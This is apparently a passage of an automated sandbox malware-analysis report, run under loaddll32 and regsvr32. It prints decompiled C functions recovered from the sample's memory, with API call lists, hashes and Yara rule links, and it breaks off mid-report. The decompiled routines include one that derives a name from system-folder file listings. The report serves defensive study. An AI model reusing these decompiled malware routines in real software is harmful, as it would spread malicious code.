                                                                                                                                                                                                                                    • RtlEnterCriticalSection.NTDLL(033E9570), ref: 02F9A5DF
                                                                                                                                                                                                                                    • Sleep.KERNEL32(0000000A,?,02F923DE), ref: 02F9A5E9
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,02F923DE), ref: 02F9A617
                                                                                                                                                                                                                                    • RtlLeaveCriticalSection.NTDLL(033E9570), ref: 02F9A62C
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 58946197-0
                                                                                                                                                                                                                                    • Opcode ID: 548a4c8a5815ff39cbcfbba6932f447144e8349288b811b50697e95987ad1d9a
                                                                                                                                                                                                                                    • Instruction ID: f1fddffa12cff8efa24cbea7ea277e566a712b5004fa46ca7ace0da4527cc0dd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 548a4c8a5815ff39cbcfbba6932f447144e8349288b811b50697e95987ad1d9a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B9F0D474E801049BEB18DB74D859E15F7A4EB08BC2F24880AEA02DB360C730EC20CE24
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F97F27, Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 58%
                                                                                                                                                                                                                                    			E02F97F27(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E02F92049(_t2);
				if(_t34 != 0) {
					_t30 = E02F92049(_t28);
					if(_t30 == 0) {
						E02F99039(_t34);
					} else {
						_t39 = _a4;
						_t22 = E02F9A911(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E02F9A911(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                                                                                                                                                                                                                    0x02f97f27
                                                                                                                                                                                                                                    0x02f97f31
                                                                                                                                                                                                                                    0x02f97f33
                                                                                                                                                                                                                                    0x02f97f39
                                                                                                                                                                                                                                    0x02f97f39
                                                                                                                                                                                                                                    0x02f97f42
                                                                                                                                                                                                                                    0x02f97f46
                                                                                                                                                                                                                                    0x02f97f52
                                                                                                                                                                                                                                    0x02f97f56
                                                                                                                                                                                                                                    0x02f97fca
                                                                                                                                                                                                                                    0x02f97f58
                                                                                                                                                                                                                                    0x02f97f58
                                                                                                                                                                                                                                    0x02f97f5c
                                                                                                                                                                                                                                    0x02f97f63
                                                                                                                                                                                                                                    0x02f97f66
                                                                                                                                                                                                                                    0x02f97f80
                                                                                                                                                                                                                                    0x02f97f6f
                                                                                                                                                                                                                                    0x02f97f6f
                                                                                                                                                                                                                                    0x02f97f73
                                                                                                                                                                                                                                    0x02f97f76
                                                                                                                                                                                                                                    0x02f97f7b
                                                                                                                                                                                                                                    0x02f97f7b
                                                                                                                                                                                                                                    0x02f97f85
                                                                                                                                                                                                                                    0x02f97fad
                                                                                                                                                                                                                                    0x02f97fb3
                                                                                                                                                                                                                                    0x02f97fb6
                                                                                                                                                                                                                                    0x02f97f87
                                                                                                                                                                                                                                    0x02f97f89
                                                                                                                                                                                                                                    0x02f97f91
                                                                                                                                                                                                                                    0x02f97f9c
                                                                                                                                                                                                                                    0x02f97fa1
                                                                                                                                                                                                                                    0x02f97fa1
                                                                                                                                                                                                                                    0x02f97fbd
                                                                                                                                                                                                                                    0x02f97fc4
                                                                                                                                                                                                                                    0x02f97fc5
                                                                                                                                                                                                                                    0x02f97fc5
                                                                                                                                                                                                                                    0x02f97f56
                                                                                                                                                                                                                                    0x02f97fd5

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,00000008,?,76D24D40,?,?,02F915A4,?,?,?,?,00000102,02F911DA,?,?,00000000), ref: 02F97F33
                                                                                                                                                                                                                                      • Part of subcall function 02F92049: RtlAllocateHeap.NTDLL(00000000,00000000,02F97E50), ref: 02F92055
                                                                                                                                                                                                                                      • Part of subcall function 02F9A911: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,02F97F61,00000000,00000001,00000001,?,?,02F915A4,?,?,?,?,00000102), ref: 02F9A91F
                                                                                                                                                                                                                                      • Part of subcall function 02F9A911: StrChrA.SHLWAPI(?,0000003F,?,?,02F915A4,?,?,?,?,00000102,02F911DA,?,?,00000000,00000000), ref: 02F9A929
                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,02F915A4,?,?,?,?,00000102,02F911DA,?), ref: 02F97F91
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02F97FA1
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 02F97FAD
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3767559652-0
                                                                                                                                                                                                                                    • Opcode ID: d50f567493e9cf3de5515fe077c9ad1dcfd280db3429af3ec88a74adc26568f9
                                                                                                                                                                                                                                    • Instruction ID: 7441eaec56f70491a495680ea26bda811e8d26e98e0efada38f9a4ab6a09f166
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d50f567493e9cf3de5515fe077c9ad1dcfd280db3429af3ec88a74adc26568f9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA218EB2904319EBDF12AFA5DC44BAEFFA9AF466C8F054055FA05AB211D735C9008BE0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F97CB8, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E02F97CB8(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E02F92049(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                                                                                                                                                                                                                    0x02f97ccd
                                                                                                                                                                                                                                    0x02f97cd1
                                                                                                                                                                                                                                    0x02f97cdb
                                                                                                                                                                                                                                    0x02f97ce2
                                                                                                                                                                                                                                    0x02f97ce5
                                                                                                                                                                                                                                    0x02f97ce7
                                                                                                                                                                                                                                    0x02f97cef
                                                                                                                                                                                                                                    0x02f97cf4
                                                                                                                                                                                                                                    0x02f97d02
                                                                                                                                                                                                                                    0x02f97d07
                                                                                                                                                                                                                                    0x02f97d11

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(004F0053,76D25520,?,00000008,033E937C,?,02F9747C,004F0053,033E937C,?,?,?,?,?,?,02F96814), ref: 02F97CC8
                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(02F9747C,?,02F9747C,004F0053,033E937C,?,?,?,?,?,?,02F96814), ref: 02F97CCF
                                                                                                                                                                                                                                      • Part of subcall function 02F92049: RtlAllocateHeap.NTDLL(00000000,00000000,02F97E50), ref: 02F92055
                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,004F0053,76D269A0,?,?,02F9747C,004F0053,033E937C,?,?,?,?,?,?,02F96814), ref: 02F97CEF
                                                                                                                                                                                                                                    • memcpy.NTDLL(76D269A0,02F9747C,00000002,00000000,004F0053,76D269A0,?,?,02F9747C,004F0053,033E937C), ref: 02F97D02
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrlenmemcpy$AllocateHeap
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2411391700-0
                                                                                                                                                                                                                                    • Opcode ID: 02c7d1cc8ebdae5b037073c8e892bf563e2ec7dac2a9c93a38ed1aa795f9240f
                                                                                                                                                                                                                                    • Instruction ID: 1afb95f6837c5af341912adba4f7b2184ca82b8fd73f425c8f0af3c0fc00550b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 02c7d1cc8ebdae5b037073c8e892bf563e2ec7dac2a9c93a38ed1aa795f9240f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7F0FF76900118BBDF11EFA9CC45CDE7BADEF493987554062EE08D7211E731EA14DBA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F93CC8, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(033E87FA,00000000,00000000,73FCC740,02F9A453,00000000), ref: 02F93CD8
                                                                                                                                                                                                                                    • lstrlen.KERNEL32(?), ref: 02F93CE0
                                                                                                                                                                                                                                      • Part of subcall function 02F92049: RtlAllocateHeap.NTDLL(00000000,00000000,02F97E50), ref: 02F92055
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(00000000,033E87FA), ref: 02F93CF4
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(00000000,?), ref: 02F93CFF
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 74227042-0
                                                                                                                                                                                                                                    • Opcode ID: d02f760e1e45257433b4dc1efaf305a4c2b0251c0c6015c98e78dfc40f389ce2
                                                                                                                                                                                                                                    • Instruction ID: e88e16cc68f0a018a263635822ef3b10c271f1ad9fb2757661248674c0bcadd6
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d02f760e1e45257433b4dc1efaf305a4c2b0251c0c6015c98e78dfc40f389ce2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36E01273D01229A78B119FE9AC48C6FFBADEF8DB91B054817FA01D3124D7259825CBE1
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Analysis Process: regsvr32.exe PID: 5828 Parent PID: 5004 regsvr32.exeCOMMON

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Function 023E12D4, Relevance: 34.7, APIs: 23, Instructions: 222memoryfiletimeCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                                    			E023E12D4(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0x23ed278; // 0x63699bc3
				_t74 = RtlAllocateHeap( *0x23ed238, 0, _t72 ^ 0x63699ac7);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0x23ed278; // 0x63699bc3
				_t78 = RtlAllocateHeap( *0x23ed238, 0, _t76 ^ 0x63699bce);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0x23ed238, _t146, _v20);
					goto L36;
				}
				_t136 =  *0x23ed278; // 0x63699bc3
				memset(_t78, 0, _t136 ^ 0x63699bce);
				_t81 =  *0x23ed27c; // 0x28da5a8
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0x23ee7f2; // 0x73797325
				_t83 = E023E95B1(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0x23ed238, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x63699bce;
				_v28.dwHighDateTime = 0x63699bce;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x63699bce) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9"); // executed
					FindCloseChangeNotification(_v32); // executed
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0x23ed27c; // 0x28da5a8
				_t16 = _t93 + 0x23ee813; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}











































                                                                                                                                                                                                                                    0x023e12dd
                                                                                                                                                                                                                                    0x023e12e3
                                                                                                                                                                                                                                    0x023e12e5
                                                                                                                                                                                                                                    0x023e12ff
                                                                                                                                                                                                                                    0x023e1303
                                                                                                                                                                                                                                    0x023e1306
                                                                                                                                                                                                                                    0x023e157b
                                                                                                                                                                                                                                    0x023e1582
                                                                                                                                                                                                                                    0x023e1582
                                                                                                                                                                                                                                    0x023e130c
                                                                                                                                                                                                                                    0x023e1321
                                                                                                                                                                                                                                    0x023e1323
                                                                                                                                                                                                                                    0x023e1327
                                                                                                                                                                                                                                    0x023e132a
                                                                                                                                                                                                                                    0x023e156b
                                                                                                                                                                                                                                    0x023e1575
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e1575
                                                                                                                                                                                                                                    0x023e1330
                                                                                                                                                                                                                                    0x023e133b
                                                                                                                                                                                                                                    0x023e1340
                                                                                                                                                                                                                                    0x023e1345
                                                                                                                                                                                                                                    0x023e1348
                                                                                                                                                                                                                                    0x023e134f
                                                                                                                                                                                                                                    0x023e1356
                                                                                                                                                                                                                                    0x023e1359
                                                                                                                                                                                                                                    0x023e155b
                                                                                                                                                                                                                                    0x023e1565
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e1565
                                                                                                                                                                                                                                    0x023e136f
                                                                                                                                                                                                                                    0x023e1373
                                                                                                                                                                                                                                    0x023e1376
                                                                                                                                                                                                                                    0x023e1379
                                                                                                                                                                                                                                    0x023e1381
                                                                                                                                                                                                                                    0x023e1384
                                                                                                                                                                                                                                    0x023e138d
                                                                                                                                                                                                                                    0x023e1393
                                                                                                                                                                                                                                    0x023e139d
                                                                                                                                                                                                                                    0x023e13a4
                                                                                                                                                                                                                                    0x023e13a4
                                                                                                                                                                                                                                    0x023e13b6
                                                                                                                                                                                                                                    0x023e13c1
                                                                                                                                                                                                                                    0x023e13cf
                                                                                                                                                                                                                                    0x023e13d4
                                                                                                                                                                                                                                    0x023e13d9
                                                                                                                                                                                                                                    0x023e13dc
                                                                                                                                                                                                                                    0x023e13e1
                                                                                                                                                                                                                                    0x023e13eb
                                                                                                                                                                                                                                    0x023e13ee
                                                                                                                                                                                                                                    0x023e13f1
                                                                                                                                                                                                                                    0x023e1407
                                                                                                                                                                                                                                    0x023e140b
                                                                                                                                                                                                                                    0x023e140e
                                                                                                                                                                                                                                    0x023e1559
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e1559
                                                                                                                                                                                                                                    0x023e1425
                                                                                                                                                                                                                                    0x023e1476
                                                                                                                                                                                                                                    0x023e1439
                                                                                                                                                                                                                                    0x023e1441
                                                                                                                                                                                                                                    0x023e1446
                                                                                                                                                                                                                                    0x023e1454
                                                                                                                                                                                                                                    0x023e145d
                                                                                                                                                                                                                                    0x023e1466
                                                                                                                                                                                                                                    0x023e1466
                                                                                                                                                                                                                                    0x023e1474
                                                                                                                                                                                                                                    0x023e1474
                                                                                                                                                                                                                                    0x023e147a
                                                                                                                                                                                                                                    0x023e147e
                                                                                                                                                                                                                                    0x023e147e
                                                                                                                                                                                                                                    0x023e1484
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e1486
                                                                                                                                                                                                                                    0x023e148c
                                                                                                                                                                                                                                    0x023e1533
                                                                                                                                                                                                                                    0x023e1536
                                                                                                                                                                                                                                    0x023e1543
                                                                                                                                                                                                                                    0x023e1543
                                                                                                                                                                                                                                    0x023e1547
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e153c
                                                                                                                                                                                                                                    0x023e1540
                                                                                                                                                                                                                                    0x023e1540
                                                                                                                                                                                                                                    0x023e1542
                                                                                                                                                                                                                                    0x023e1542
                                                                                                                                                                                                                                    0x023e154c
                                                                                                                                                                                                                                    0x023e1553
                                                                                                                                                                                                                                    0x023e1555
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x023e1555
                                                                                                                                                                                                                                    0x023e1492
                                                                                                                                                                                                                                    0x023e1494
                                                                                                                                                                                                                                    0x023e1494
                                                                                                                                                                                                                                    0x023e14a7
                                                                                                                                                                                                                                    0x023e14ad
                                                                                                                                                                                                                                    0x023e14b8
                                                                                                                                                                                                                                    0x023e14ba
                                                                                                                                                                                                                                    0x023e14be
                                                                                                                                                                                                                                    0x023e14c0
                                                                                                                                                                                                                                    0x023e14c0
                                                                                                                                                                                                                                    0x023e14c5
                                                                                                                                                                                                                                    0x023e14c7
                                                                                                                                                                                                                                    0x023e14c7
                                                                                                                                                                                                                                    0x023e14c5
                                                                                                                                                                                                                                    0x023e14cc
                                                                                                                                                                                                                                    0x023e14d0
                                                                                                                                                                                                                                    0x023e14d0
                                                                                                                                                                                                                                    0x023e14e0
                                                                                                                                                                                                                                    0x023e14e5
                                                                                                                                                                                                                                    0x023e14e8
                                                                                                                                                                                                                                    0x023e14e8
                                                                                                                                                                                                                                    0x023e14eb
                                                                                                                                                                                                                                    0x023e14f5
                                                                                                                                                                                                                                    0x023e14fd
                                                                                                                                                                                                                                    0x023e1502
                                                                                                                                                                                                                                    0x023e1510
                                                                                                                                                                                                                                    0x023e1510
                                                                                                                                                                                                                                    0x023e1524
                                                                                                                                                                                                                                    0x023e1528
                                                                                                                                                                                                                                    0x023e1528

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 023E12FF
                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 023E1321
                                                                                                                                                                                                                                    • memset.NTDLL ref: 023E133B
                                                                                                                                                                                                                                      • Part of subcall function 023E95B1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,023E23E9,63699BCE,023E1354,73797325), ref: 023E95C2
                                                                                                                                                                                                                                      • Part of subcall function 023E95B1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 023E95DC
                                                                                                                                                                                                                                    • CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 023E1379
                                                                                                                                                                                                                                    • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 023E138D
                                                                                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000), ref: 023E13A4
                                                                                                                                                                                                                                    • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 023E13B0
                                                                                                                                                                                                                                    • lstrcat.KERNEL32(?,642E2A5C), ref: 023E13F1
                                                                                                                                                                                                                                    • FindFirstFileA.KERNELBASE(?,?), ref: 023E1407
                                                                                                                                                                                                                                    • CompareFileTime.KERNEL32(?,?), ref: 023E1425
                                                                                                                                                                                                                                    • FindNextFileA.KERNELBASE(023E96C1,?), ref: 023E1439
                                                                                                                                                                                                                                    • FindClose.KERNEL32(023E96C1), ref: 023E1446
                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 023E1452
                                                                                                                                                                                                                                    • CompareFileTime.KERNEL32(?,?), ref: 023E1474
                                                                                                                                                                                                                                    • StrChrA.SHLWAPI(?,0000002E), ref: 023E14A7
                                                                                                                                                                                                                                    • memcpy.NTDLL(00000000,?,00000000), ref: 023E14E0
                                                                                                                                                                                                                                    • FindNextFileA.KERNELBASE(023E96C1,?), ref: 023E14F5
                                                                                                                                                                                                                                    • FindClose.KERNEL32(023E96C1), ref: 023E1502
                                                                                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 023E150E
                                                                                                                                                                                                                                    • CompareFileTime.KERNEL32(?,?), ref: 023E151E
                                                                                                                                                                                                                                    • FindClose.KERNELBASE(023E96C1), ref: 023E1553
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 023E1565
                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?), ref: 023E1575
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.521955532.00000000023E1000.00000020.00020000.sdmp, Offset: 023E0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.521844516.00000000023E0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522125051.00000000023EC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522265607.00000000023ED000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.522450053.00000000023EF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_23e0000_regsvr32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2944988578-0
                                                                                                                                                                                                                                    • Opcode ID: 971fc63b216bce1e3c7d5c510ff227b5ea8d11727d75de09293a2ed65e2fbb22
                                                                                                                                                                                                                                    • Instruction ID: be4ddb52db063d6af2cbb69b026561efe23a8099504c879071c2cf2538b6f318
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 971fc63b216bce1e3c7d5c510ff227b5ea8d11727d75de09293a2ed65e2fbb22
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D8118B1D00119EFDF218FA5DC44AEEBBBDBF44300F104966E556EA290D7309A58CF60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 023E83B7, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

